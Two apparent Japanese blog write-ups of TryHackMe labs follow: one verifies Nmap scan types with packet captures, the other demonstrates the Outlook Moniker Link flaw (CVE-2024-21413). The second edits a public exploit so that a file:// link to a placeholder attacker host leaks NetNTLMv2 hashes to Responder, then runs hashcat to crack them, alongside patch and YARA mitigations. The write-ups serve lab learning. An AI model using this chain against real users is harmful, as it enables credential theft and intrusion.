はじめに

Nmapで実際にポートスキャンをしてみた。
検証環境は TryHackMe の Nmap ルーム。

TryHackMe

Nmap An in depth look at scanning with Nmap, a powerful network scanning tool.

本記事の内容は教育目的のみに記載しています。実環境での悪用は犯罪行為です。必ず許可された演習環境でのみ実践してください。

TCPスキャン

使用頻度上位 100 ポートのみ（–top-ports 100）、スキャン中の詳細を表示（-vv）、pingをスキップ（-Pn）して
TCPスキャン（-sT）。

$ sudo nmap -sT --top-ports 100 -vv -Pn target ip

openポートを発見。

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-23 23:57 JST
Initiating Parallel DNS resolution of 1 host. at 23:57
Completed Parallel DNS resolution of 1 host. at 23:57, 0.00s elapsed
Initiating Connect Scan at 23:57
Scanning target ip [100 ports]
Discovered open port 3389/tcp on target ip
Discovered open port 135/tcp on target ip
Discovered open port 80/tcp on target ip
Discovered open port 21/tcp on target ip
Discovered open port 53/tcp on target ip
Completed Connect Scan at 23:57, 7.02s elapsed (100 total ports)
Nmap scan report for target ip
Host is up, received user-set (0.37s latency).
Scanned at 2025-10-23 23:57:10 JST for 7s
Not shown: 95 filtered tcp ports (no-response)
PORT     STATE SERVICE       REASON
21/tcp   open  ftp           syn-ack
53/tcp   open  domain        syn-ack
80/tcp   open  http          syn-ack
135/tcp  open  msrpc         syn-ack
3389/tcp open  ms-wbt-server syn-ack

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 7.03 seconds

tshark でログを取っていたので確認してみる。

# tshark の結果を sT_result.txt へ出力
$ sudo tshark -i tun0 > sT_result.txt 
Running as user "root" and group "root". This could be dangerous.
Capturing on 'tun0'
237 ^C

# cat で全体のログを確認
$ cat sT_result.txt             
    1 0.000000000   host ip → target ip TCP 60 34450 → 111 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=245774735 TSecr=0 WS=128
    2 0.000013296   host ip → target ip TCP 60 47774 → 113 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=245774735 TSecr=0 WS=128
    3 0.000018708   host ip → target ip TCP 60 38474 → 135 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=245774735 TSecr=0 WS=128
    4 0.000025294   host ip → target ip TCP 60 55670 → 5900 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=245774735 TSecr=0 WS=128
    5 0.000030624   host ip → target ip TCP 60 46124 → 25 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=245774735 TSecr=0 WS=128
    6 0.000035786   host ip → target ip TCP 60 59490 → 554 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=245774735 TSecr=0 WS=128
    7 0.000041544   host ip → target ip TCP 60 38960 → 3306 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=245774735 TSecr=0 WS=128
    8 0.000048233   host ip → target ip TCP 60 57882 → 110 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=245774735 TSecr=0 WS=128
    9 0.000052118   host ip → target ip TCP 60 42396 → 3389 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=245774735 TSecr=0 WS=128
   10 0.000059820   host ip → target ip TCP 60 37896 → 8888 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=245774735 TSecr=0 WS=128
   11 0.377319586 target ip → host ip   TCP 52 135 → 38474 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1288 WS=256 SACK_PERM
   12 0.377390839   host ip → target ip TCP 40 38474 → 135 [ACK] Seq=1 Ack=1 Win=64256 Len=0
   13 0.378715797   host ip → target ip TCP 40 38474 → 135 [RST, ACK] Seq=1 Ack=1 Win=64256 Len=0
   14 0.378932212   host ip → target ip TCP 60 47616 → 23 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=245775114 TSecr=0 WS=128
   15 0.378957703   host ip → target ip TCP 60 43838 → 995 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=245775114 TSecr=0 WS=128
   16 1.027607473   host ip → target ip TCP 60 [TCP Retransmission] 37896 → 8888 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=245775763 TSecr=0 WS=128
（省略）

ログを絞って確認。

# SYN 以外のログで絞ってみる
$ cat sT_result.txt | grep -v -F "[SYN]"
   11 0.377319586 target ip → host ip   TCP 52 135 → 38474 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1288 WS=256 SACK_PERM
   12 0.377390839   host ip → target ip TCP 40 38474 → 135 [ACK] Seq=1 Ack=1 Win=64256 Len=0
   13 0.378715797   host ip → target ip TCP 40 38474 → 135 [RST, ACK] Seq=1 Ack=1 Win=64256 Len=0
   28 2.268681269 target ip → host ip   TCP 52 135 → 38490 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1288 WS=256 SACK_PERM
   29 2.268724628   host ip → target ip TCP 40 38490 → 135 [ACK] Seq=1 Ack=1 Win=64256 Len=0
   30 2.268783378   host ip → target ip TCP 40 38490 → 135 [RST, ACK] Seq=1 Ack=1 Win=64256 Len=0
   61 3.272603426 target ip → host ip   TCP 52 21 → 43260 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1288 WS=256 SACK_PERM
   62 3.272698420   host ip → target ip TCP 40 43260 → 21 [ACK] Seq=1 Ack=1 Win=64256 Len=0
   63 3.273334678 target ip → host ip   TCP 52 53 → 58022 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1288 WS=256 SACK_PERM
   64 3.273357934   host ip → target ip TCP 40 58022 → 53 [ACK] Seq=1 Ack=1 Win=64256 Len=0
   65 3.273693028   host ip → target ip TCP 40 43260 → 21 [RST, ACK] Seq=1 Ack=1 Win=64256 Len=0
   66 3.274013386   host ip → target ip TCP 40 58022 → 53 [RST, ACK] Seq=1 Ack=1 Win=64256 Len=0
   77 3.274796974 target ip → host ip   TCP 52 80 → 49068 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1288 WS=256 SACK_PERM
   78 3.274865411   host ip → target ip TCP 40 49068 → 80 [ACK] Seq=1 Ack=1 Win=64256 Len=0
   79 3.274951087   host ip → target ip TCP 40 49068 → 80 [RST, ACK] Seq=1 Ack=1 Win=64256 Len=0
   84 3.387604406 target ip → host ip   TCP 52 3389 → 42396 [SYN, ACK] Seq=0 Ack=1 Win=64000 Len=0 MSS=1288 WS=1 SACK_PERM
   85 3.387628199   host ip → target ip TCP 40 42396 → 3389 [RST] Seq=1 Win=0 Len=0
  150 4.998246831 target ip → host ip   TCP 52 135 → 38502 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1288 WS=256 SACK_PERM
  151 4.998329872   host ip → target ip TCP 40 38502 → 135 [ACK] Seq=1 Ack=1 Win=64256 Len=0
  152 4.998587904   host ip → target ip TCP 40 38502 → 135 [RST, ACK] Seq=1 Ack=1 Win=64256 Len=0
  232 6.277318520 target ip → host ip   TCP 52 3389 → 42398 [SYN, ACK] Seq=0 Ack=1 Win=64000 Len=0 MSS=1288 WS=1 SACK_PERM
  233 6.277337412   host ip → target ip TCP 40 42398 → 3389 [RST] Seq=1 Win=0 Len=0
  235 6.857444881 target ip → host ip   TCP 52 135 → 38504 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1288 WS=256 SACK_PERM
  236 6.857524021   host ip → target ip TCP 40 38504 → 135 [ACK] Seq=1 Ack=1 Win=64256 Len=0
  237 6.858089282   host ip → target ip TCP 40 38504 → 135 [RST, ACK] Seq=1 Ack=1 Win=64256 Len=0

# SYN/ACK（open）で絞ってみる
$ cat sT_result.txt | grep -F "[SYN, ACK]"
   11 0.377319586 target ip → host ip   TCP 52 135 → 38474 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1288 WS=256 SACK_PERM
   28 2.268681269 target ip → host ip   TCP 52 135 → 38490 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1288 WS=256 SACK_PERM
   61 3.272603426 target ip → host ip   TCP 52 21 → 43260 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1288 WS=256 SACK_PERM
   63 3.273334678 target ip → host ip   TCP 52 53 → 58022 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1288 WS=256 SACK_PERM
   77 3.274796974 target ip → host ip   TCP 52 80 → 49068 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1288 WS=256 SACK_PERM
   84 3.387604406 target ip → host ip   TCP 52 3389 → 42396 [SYN, ACK] Seq=0 Ack=1 Win=64000 Len=0 MSS=1288 WS=1 SACK_PERM
  150 4.998246831 target ip → host ip   TCP 52 135 → 38502 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1288 WS=256 SACK_PERM
  232 6.277318520 target ip → host ip   TCP 52 3389 → 42398 [SYN, ACK] Seq=0 Ack=1 Win=64000 Len=0 MSS=1288 WS=1 SACK_PERM
  235 6.857444881 target ip → host ip   TCP 52 135 → 38504 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1288 WS=256 SACK_PERM

# openポートの確認
$ cat sT_result.txt | grep -F "[SYN, ACK]" | awk '{print $8}' | sort -n -u
21
53
80
135
3389

SYN/ACK を返しているポートが open と判定されており、nmap のスキャン結果と tshark のログが一致していることが確認できた。

最後に、awk を使って TCP ハンドシェイク（SYN → SYN/ACK → ACK）が実際に成立しているかを確認してみる。

$ awk '    
  # 行中の「<num> → <num>」を1組だけ抜き出す
  match($0, /[[:space:]]([0-9]+)[[:space:]]*→[[:space:]]*([0-9]+)[[:space:]]/, m) {
    if (m[1]==21 || m[2]==21) print  
  }      
' sT_result.txt
   52 2.896504834   host ip → target ip TCP 60 43260 → 21 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=245777632 TSecr=0 WS=128
   61 3.272603426 target ip → host ip   TCP 52 21 → 43260 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1288 WS=256 SACK_PERM
   62 3.272698420   host ip → target ip TCP 40 43260 → 21 [ACK] Seq=1 Ack=1 Win=64256 Len=0
   65 3.273693028   host ip → target ip TCP 40 43260 → 21 [RST, ACK] Seq=1 Ack=1 Win=64256 Len=0

TCP ハンドシェイクが成立していることが分かる。

SYNスキャン（ハーフオープンスキャン）

使用頻度上位 100 ポートのみ（–top-ports 100）、スキャン中の詳細を表示（-vv）、pingをスキップ（-Pn）して
SYNスキャン（-sS）。

$ sudo nmap -sS --top-ports 100 -vv -Pn target ip

openポートを発見。

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-26 13:06 JST
Initiating Parallel DNS resolution of 1 host. at 13:06
Completed Parallel DNS resolution of 1 host. at 13:06, 0.00s elapsed
Initiating SYN Stealth Scan at 13:06
Scanning target ip [100 ports]
Discovered open port 80/tcp on target ip
Discovered open port 21/tcp on target ip
Discovered open port 3389/tcp on target ip
Discovered open port 135/tcp on target ip
Discovered open port 53/tcp on target ip
Completed SYN Stealth Scan at 13:06, 6.14s elapsed (100 total ports)
Nmap scan report for target ip
Host is up, received user-set (0.34s latency).
Scanned at 2025-10-26 13:06:36 JST for 7s
Not shown: 95 filtered tcp ports (no-response)
PORT     STATE SERVICE       REASON
21/tcp   open  ftp           syn-ack ttl 124
53/tcp   open  domain        syn-ack ttl 124
80/tcp   open  http          syn-ack ttl 124
135/tcp  open  msrpc         syn-ack ttl 124
3389/tcp open  ms-wbt-server syn-ack ttl 124

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 6.20 seconds
           Raw packets sent: 197 (8.668KB) | Rcvd: 7 (308B)

今度は pcap でログを取ってみる。

$ sudo tshark -i tun0 -w /tmp/Ss_result.pcap                                 
Running as user "root" and group "root". This could be dangerous.
Capturing on 'tun0'
211 ^C

# tshark で全体のログを確認
$ sudo tshark -r Ss_result.pcap                     
Running as user "root" and group "root". This could be dangerous.
    1 0.000000000   host ip → target ip TCP 44 63626 → 993 [SYN] Seq=0 Win=1024 Len=0 MSS=1460
    2 0.000010601   host ip → target ip TCP 44 63626 → 445 [SYN] Seq=0 Win=1024 Len=0 MSS=1460
    3 0.000011875   host ip → target ip TCP 44 63626 → 110 [SYN] Seq=0 Win=1024 Len=0 MSS=1460
    4 0.000012902   host ip → target ip TCP 44 63626 → 23 [SYN] Seq=0 Win=1024 Len=0 MSS=1460
    5 0.000013856   host ip → target ip TCP 44 63626 → 111 [SYN] Seq=0 Win=1024 Len=0 MSS=1460
    6 0.000014615   host ip → target ip TCP 44 63626 → 80 [SYN] Seq=0 Win=1024 Len=0 MSS=1460
    7 0.000015329   host ip → target ip TCP 44 63626 → 3389 [SYN] Seq=0 Win=1024 Len=0 MSS=1460
    8 0.000016047   host ip → target ip TCP 44 63626 → 113 [SYN] Seq=0 Win=1024 Len=0 MSS=1460
    9 0.000016757   host ip → target ip TCP 44 63626 → 21 [SYN] Seq=0 Win=1024 Len=0 MSS=1460
   10 0.000017461   host ip → target ip TCP 44 63626 → 587 [SYN] Seq=0 Win=1024 Len=0 MSS=1460
   11 0.338039856 target ip → host ip   TCP 44 80 → 63626 [SYN, ACK] Seq=0 Ack=1 Win=64400 Len=0 MSS=1288
   12 0.338076236   host ip → target ip TCP 40 63626 → 80 [RST] Seq=1 Win=0 Len=0
   13 0.338747181 target ip → host ip   TCP 44 21 → 63626 [SYN, ACK] Seq=0 Ack=1 Win=64400 Len=0 MSS=1288
   14 0.338809373   host ip → target ip TCP 40 63626 → 21 [RST] Seq=1 Win=0 Len=0
   15 0.339557912 target ip → host ip   TCP 44 3389 → 63626 [SYN, ACK] Seq=0 Ack=1 Win=64000 Len=0 MSS=1288
   16 0.339571791   host ip → target ip TCP 40 63626 → 3389 [RST] Seq=1 Win=0 Len=0
(省略)

ログを絞って確認。

# SYN 以外のログで絞ってみる
$ sudo tshark -r sS_result.pcap -Y "not (tcp.flags.syn==1 && tcp.flags.ack==0)"
Running as user "root" and group "root". This could be dangerous.
   11 0.338039856 target ip8 → host ip   TCP 44 80 → 63626 [SYN, ACK] Seq=0 Ack=1 Win=64400 Len=0 MSS=1288
   12 0.338076236   host ip → target ip8 TCP 40 63626 → 80 [RST] Seq=1 Win=0 Len=0
   13 0.338747181 target ip8 → host ip   TCP 44 21 → 63626 [SYN, ACK] Seq=0 Ack=1 Win=64400 Len=0 MSS=1288
   14 0.338809373   host ip → target ip8 TCP 40 63626 → 21 [RST] Seq=1 Win=0 Len=0
   15 0.339557912 target ip8 → host ip   TCP 44 3389 → 63626 [SYN, ACK] Seq=0 Ack=1 Win=64000 Len=0 MSS=1288
   16 0.339571791   host ip → target ip8 TCP 40 63626 → 3389 [RST] Seq=1 Win=0 Len=0
   23 0.677269837 target ip8 → host ip   TCP 44 135 → 63626 [SYN, ACK] Seq=0 Ack=1 Win=64400 Len=0 MSS=1288
   24 0.677332313   host ip → target ip8 TCP 40 63626 → 135 [RST] Seq=1 Win=0 Len=0
   55 3.165016037 target ip8 → host ip   TCP 44 53 → 63626 [SYN, ACK] Seq=0 Ack=1 Win=64400 Len=0 MSS=1288
   56 3.165076706   host ip → target ip8 TCP 40 63626 → 53 [RST] Seq=1 Win=0 Len=0
   57 3.165703655 target ip8 → host ip   TCP 44 80 → 63631 [SYN, ACK] Seq=0 Ack=1 Win=64400 Len=0 MSS=1288
   58 3.165753573   host ip → target ip8 TCP 40 63631 → 80 [RST] Seq=1 Win=0 Len=0
  173 4.863356730 target ip8 → host ip   TCP 44 80 → 63633 [SYN, ACK] Seq=0 Ack=1 Win=64400 Len=0 MSS=1288
  174 4.863426175   host ip → target ip8 TCP 40 63633 → 80 [RST] Seq=1 Win=0 Len=0

# SYN/ACK（open）で絞ってみる
$ sudo tshark -r sS_result.pcap -Y "tcp.flags.syn==1 && tcp.flags.ack==1"
Running as user "root" and group "root". This could be dangerous.
   11 0.338039856 target ip8 → host ip   TCP 44 80 → 63626 [SYN, ACK] Seq=0 Ack=1 Win=64400 Len=0 MSS=1288
   13 0.338747181 target ip8 → host ip   TCP 44 21 → 63626 [SYN, ACK] Seq=0 Ack=1 Win=64400 Len=0 MSS=1288
   15 0.339557912 target ip8 → host ip   TCP 44 3389 → 63626 [SYN, ACK] Seq=0 Ack=1 Win=64000 Len=0 MSS=1288
   23 0.677269837 target ip8 → host ip   TCP 44 135 → 63626 [SYN, ACK] Seq=0 Ack=1 Win=64400 Len=0 MSS=1288
   55 3.165016037 target ip8 → host ip   TCP 44 53 → 63626 [SYN, ACK] Seq=0 Ack=1 Win=64400 Len=0 MSS=1288
   57 3.165703655 target ip8 → host ip   TCP 44 80 → 63631 [SYN, ACK] Seq=0 Ack=1 Win=64400 Len=0 MSS=1288
  173 4.863356730 target ip8 → host ip   TCP 44 80 → 63633 [SYN, ACK] Seq=0 Ack=1 Win=64400 Len=0 MSS=1288

# openポートの確認
$ sudo tshark -r sS_result.pcap -Y "tcp.flags.syn==1 && tcp.flags.ack==1" -T fields -e tcp.srcport | sort -n -u
Running as user "root" and group "root". This could be dangerous.
21
53
80
135
3389

SYN/ACK を返しているポートが open になっているので、nmap の結果と tshark のログは一致している。

ハーフオープンスキャン（SYN→SYN/ACK→RST）を本当にしているか確認してみる。

$ sudo tshark -r sS_result.pcap -Y "tcp.port == 21"                            
Running as user "root" and group "root". This could be dangerous.
    9 0.000016757   host ip → target ip TCP 44 63626 → 21 [SYN] Seq=0 Win=1024 Len=0 MSS=1460
   13 0.338747181 target ip → host ip   TCP 44 21 → 63626 [SYN, ACK] Seq=0 Ack=1 Win=64400 Len=0 MSS=1288
   14 0.338809373   host ip → target ip TCP 40 63626 → 21 [RST] Seq=1 Win=0 Len=0

SYN/ACK に対して RST で切断しているため、ハーフオープンスキャンの挙動。

UDPスキャン

使用頻度上位 100 ポートのみ（–top-ports 100）、スキャン中の詳細を表示（-vv）、pingをスキップ（-Pn）して
UDPスキャン（-sU）。

$ sudo nmap -sU --top-ports 100 -vv -Pn target ip

openポートを発見。

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-26 14:03 JST
Initiating Parallel DNS resolution of 1 host. at 14:03
Completed Parallel DNS resolution of 1 host. at 14:03, 0.00s elapsed
Initiating UDP Scan at 14:03
Scanning target ip [100 ports]
Discovered open port 53/udp on target ip
Completed UDP Scan at 14:03, 12.09s elapsed (100 total ports)
Nmap scan report for target ip
Host is up, received user-set (0.36s latency).
Scanned at 2025-10-26 14:03:17 JST for 11s
Not shown: 99 open|filtered udp ports (no-response)
PORT   STATE SERVICE REASON
53/udp open  domain  udp-response ttl 124

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 12.15 seconds
           Raw packets sent: 261 (16.044KB) | Rcvd: 4 (262B)

pcap でログを取ってみる。

$ sudo tshark -i tun0 -w /tmp/sU_result.pcap                                            
Running as user "root" and group "root". This could be dangerous.
Capturing on 'tun0'
273 ^C

今回は Wireshar でログを確認してみる。

$ sudo wireshark sU_result.pcap  

ip.src == target ip で応答のあったものだけ絞る。

ip.src == target ip && not icmp

DNS のみ表示されたので、nmap の結果と一致。

特殊スキャン（NULL／FIN／Xmas）

検証環境でopenポートが見つからなかったので、今回はフラグだけ確認。

NULLスキャン

# NULLスキャン
$ sudo nmap -sN --top-ports 100 -vv -Pn target ip

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-26 14:57 JST
Initiating Parallel DNS resolution of 1 host. at 14:57
Completed Parallel DNS resolution of 1 host. at 14:57, 0.00s elapsed
Initiating NULL Scan at 14:57
Scanning target ip [100 ports]
Completed NULL Scan at 14:57, 21.11s elapsed (100 total ports)
Nmap scan report for target ip
Host is up, received user-set.
Scanned at 2025-10-26 14:57:12 JST for 22s
All 100 scanned ports on target ip are in ignored states.
Not shown: 100 open|filtered tcp ports (no-response)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 21.15 seconds
           Raw packets sent: 200 (8.000KB) | Rcvd: 0 (0B)

フラグはすべて0。

FINスキャン

# FINスキャン
$ sudo nmap -sF --top-ports 100 -vv -Pn target ip

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-26 14:52 JST
Initiating Parallel DNS resolution of 1 host. at 14:52
Completed Parallel DNS resolution of 1 host. at 14:52, 0.00s elapsed
Initiating FIN Scan at 14:52
Scanning target ip [100 ports]
Completed FIN Scan at 14:52, 21.09s elapsed (100 total ports)
Nmap scan report for target ip
Host is up, received user-set.
Scanned at 2025-10-26 14:52:08 JST for 21s
All 100 scanned ports on target ip are in ignored states.
Not shown: 100 open|filtered tcp ports (no-response)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 21.18 seconds
           Raw packets sent: 200 (8.000KB) | Rcvd: 0 (0B)

FIN = 1。

Xmasスキャン

# Xmasスキャン
$ sudo nmap -sX --top-ports 100 -vv -Pn target ip

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-26 14:52 JST
Initiating Parallel DNS resolution of 1 host. at 14:52
Completed Parallel DNS resolution of 1 host. at 14:52, 0.01s elapsed
Initiating XMAS Scan at 14:52
Scanning target ip [100 ports]
Completed XMAS Scan at 14:53, 21.09s elapsed (100 total ports)
Nmap scan report for target ip
Host is up, received user-set.
Scanned at 2025-10-26 14:52:53 JST for 21s
All 100 scanned ports on target ip are in ignored states.
Not shown: 100 open|filtered tcp ports (no-response)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 21.16 seconds
           Raw packets sent: 200 (8.000KB) | Rcvd: 0 (0B)

FIN = 1、PSH = 1、URG = 1。

おまけ

UDPスキャンでホストIPとターゲットIP以外に 239.255.255.250（SSDP¹用マルチキャストアドレス）への通信を発見。

nmapはスキャン中に「このネットワーク内にUPnP²デバイスがいるか？」を自動的にチェックすることがあり、その時にこの宛先へ M-SEARCH * HTTP/1.1 パケットを送信するそう。

1. 家庭内ネットワークなどで機器同士が自動的に見つけ合うための通信プロトコル。UPnPの一部として定義されており、主にUDPの1900番ポートを使う。 ↩︎
2. Universal Plug and Play。家庭やオフィス内のネットワーク機器が自動的に見つけ合い、設定なしで通信できるようにする仕組み。 ↩︎

はじめに

Moniker Link (CVE-2024-21413) の備忘録。
本記事は学習記録です。演習環境のターゲット名・IP・フラグは公開していません。

本記事の内容は教育目的のみに記載しています。実環境での悪用は犯罪行為です。必ず許可された演習環境でのみ実践してください。

TryHackMe

Moniker Link (CVE-2024-21413) Leak user’s credentials using CVE-2024-21413 to bypass Outlook’s Protected View.

Moniker Link (CVE-2024-21413) 

Moniker Link（モニカー・リンク）とは

Moniker Link は Windows のComponent Object Model（COM）¹で使われる「モニカー（識別子）」を指す仕組みの一種で、Outlook がメール中の特定のリンク（例えば file:// で始まるリンク）を処理するときに Moniker Link として解釈されることがある。

特定の形式（末尾に ! を含める等）にすると Outlook の「Protected View（保護ビュー／保護モード）」を回避してしまいリモートのファイルを読み込みにいってしまう問題が見つかった。これを悪用するとユーザーの認証情報（netNTLMv2 ハッシュ）を攻撃者に送らせることができる。

CVE-2024-21413

Outlook が特定のリンク（特に file:// スキームで始まり、後に ! 記号を含むような形式）を解釈すると、リンク先リソースにアクセスを試み、その過程で NTLM 認証情報（netNTLMv2 ハッシュ）を自動的に送信してしまうという挙動が発生するように設計上の欠陥があることが発見された。

さらに、悪意あるリンクを使えば Protected View（保護モード／読み取り専用モード）をバイパスして、ファイルを編集モードで開かせる・実行させるような挙動を誘導でき、その結果、リモートコード実行（Remote Code Execution, RCE）を引き起こす可能性も指摘されている。

実演

Responder で待ち受け

まずは Responder² で待ち受け。

# インターフェースの特定
└─$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    ~以下IP情報（マスク）~

2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    ~以下IP情報（マスク）~

3: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
    ~以下IP情報（マスク）~

# tun0で待ち受け
sudo responder -I tun0 

exploit.py の編集

GitHub のコードをコピペし編集。

GitHub

GitHub – CMNatic/CVE-2024-21413: CVE-2024-21413 PoC for THM Lab CVE-2024-21413 PoC for THM Lab. Contribute to CMNatic/CVE-2024-21413 development by creating an account on GitHub.

# 行を表示しエディタを開く
nano -l exploit.py

17行目の ATTACKER_MACHINE を 待ち受け端末のIPに変更。

<p><a href="file://ATTACKER_MACHINE(※ここをIPアドレスに変更)/test!exploit">Click me</a></p>

31行目の MAILSERVER をターゲットマシンのIPに変更。

server = smtplib.SMTP('MAILSERVER(※ここをIPアドレスに変更)', 25)

ターゲットマシンの Outlook を起動

ターゲットマシンの Outlook を起動。

exploit.py を実行

exploit.py を実行。
このコードを実行するとターゲットマシンにメールが送信される。

# exploit.py を実行
$ python3 exploit.py                                          
Enter your attacker email password: ********

 Email delivered

Outlook で届いたメールのリンクをクリック

Outlook で届いたメールのリンクをクリック。
待ち受け端末に情報が送信される。

Responder の確認

Responder で netNTLMv2 ハッシュがキャプチャされている。

[SMB] NTLMv2-SSP Client   : x.x.x.x
[SMB] NTLMv2-SSP Username : THM-MONIKERLINK\tryhackme
[SMB] NTLMv2-SSP Hash     : tryhackme::THM-MONIKERLINK:a2b23215af9cc5d0:ハッシュが表示される                                           
[*] Skipping previously captured hash for THM-MONIKERLINK\tryhackme
[*] Skipping previously captured hash for THM-MONIKERLINK\tryhackme
[*] Skipping previously captured hash for THM-MONIKERLINK\tryhackme
[*] Skipping previously captured hash for THM-MONIKERLINK\tryhackme
[*] Skipping previously captured hash for THM-MONIKERLINK\tryhackme
[*] Skipping previously captured hash for THM-MONIKERLINK\tryhackme
[*] Skipping previously captured hash for THM-MONIKERLINK\tryhackme
[*] Skipping previously captured hash for THM-MONIKERLINK\tryhackme

エラーが発生する

test!exploit のような共有は存在しないため、Outlook は「We can’t find ‘…\test!exploit’」というエラーを出す。
これはファイルが無いことを示す正常な挙動。ただし、重要なのはエラーが表示される前にクライアントは外部ホストへ接続を試み、NTLMによる認証ハンドシェイクが発生する点。攻撃者はこのハンドシェイクで得られるチャレンジ／レスポンスの情報を受け取る。

対策

一部対策を紹介。

公式修正を適用する

Microsoft が公開しているセキュリティ更新を適用。

カスタムルールで検出

GitHub 上でFlorian Roth 氏によって作成・公開された YARA³ ルールが利用可能。

GitHub

signature-base/yara/expl_outlook_cve_2024_21413.yar at master · Neo23x0/signature-base YARA signature and IOC database for my scanners and tools – Neo23x0/signature-base

疑問に思ったこと

なぜ netNTLMv2 ハッシュが取得されると危険なのか

NTLM認証はチャレンジ／レスポンス方式で行われ、パスワードそのものは送信されない。
そのため、「ハッシュを取られても意味がないのでは？」と疑問に思った。
調べてみると、ハッシュが窃取されると次の攻撃に繋がるため危険だということが分かった。

例えば、
取得したハッシュ値をオフラインで解析（クラック）できる。
（オフラインで行うため検知されず、何度でも試行可能。）

また、受け取った認証情報を他のサービスへの認証にそのまま使える条件が揃えば、
リレー攻撃（Relay Attack）によって権限を横展開できる。

このようにハッシュの窃取自体が次の侵入の足掛かりになるため、危険性が高い。

ハッシュではなくレスポンスが窃取されるのではないか

「NTLM認証はレスポンスを返すので、レスポンスが窃取されるのであって、ハッシュは取られないのでは？」と疑問に思った。調べてみると表現の問題だったようで、正確にはチャレンジ（server_challenge）とレスポンス（response）がセットで窃取されているとのこと。

シーケンス図

ユーザー端末 (Client)            サーバ (Server)            攻撃者 (Attacker)
-------------------            -------------            ------------------
1. Negotiate ----------------->                              （認証方式の提案）
                               2. ServerChallenge ----------> （チャレンジ送信）
<-- (Challenge) -------------  

3. Client: 内部計算
   - NTLMv2_hash = HMAC_MD5( NTLM_hash(PW), User+Domain )
   - ClientBlob = {timestamp, client_challenge, ...}
   - NTLMv2_response = HMAC_MD5( NTLMv2_hash, ServerChallenge ∥ ClientBlob )
                             
4. Client --------------------> Server
   （NTLMv2_response ＋ ClientBlob を送信）
                            ↑
                            |  （同じレスポンスを攻撃者が待ち受けて受信可能）
                            |  攻撃者は名前解決/SMB等でこのやり取りを誘発・傍受
                            v
   Attacker captures: {ServerChallenge, NTLMv2_response, ClientBlob, Username, Domain, ClientIP}

おまけ

窃取した netNTLMv2 ハッシュを rockyou.txt で辞書攻撃してみたが、パスワードは見つからなかった。

# hashcat で辞書攻撃
$ hashcat -m 5600 -a 0 hashcat_test /usr/share/wordlists/rockyou.txt

# マスク済み出力（抜粋）
hashcat (v6.2.6) starting

Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: TRYHACKME::<REDACTED_HASH>
Time.Started.....: Tue Oct  7 21:22:25 2025 (6 secs)
Speed.#1.........:  2317.3 kH/s
Recovered........: 0/1 (0.00%)
Progress.........: 14344385/14344385 (100.00%)

# 結果確認（回復済みパスワードの表示）
$ hashcat -m 5600 --show hashcat_test
# （出力が何もなければ、辞書で回復できていないことを意味する）

1. Microsoft が開発した Windows 上で動く部品（コンポーネント）同士をやり取りさせるための仕組み。 ↩︎
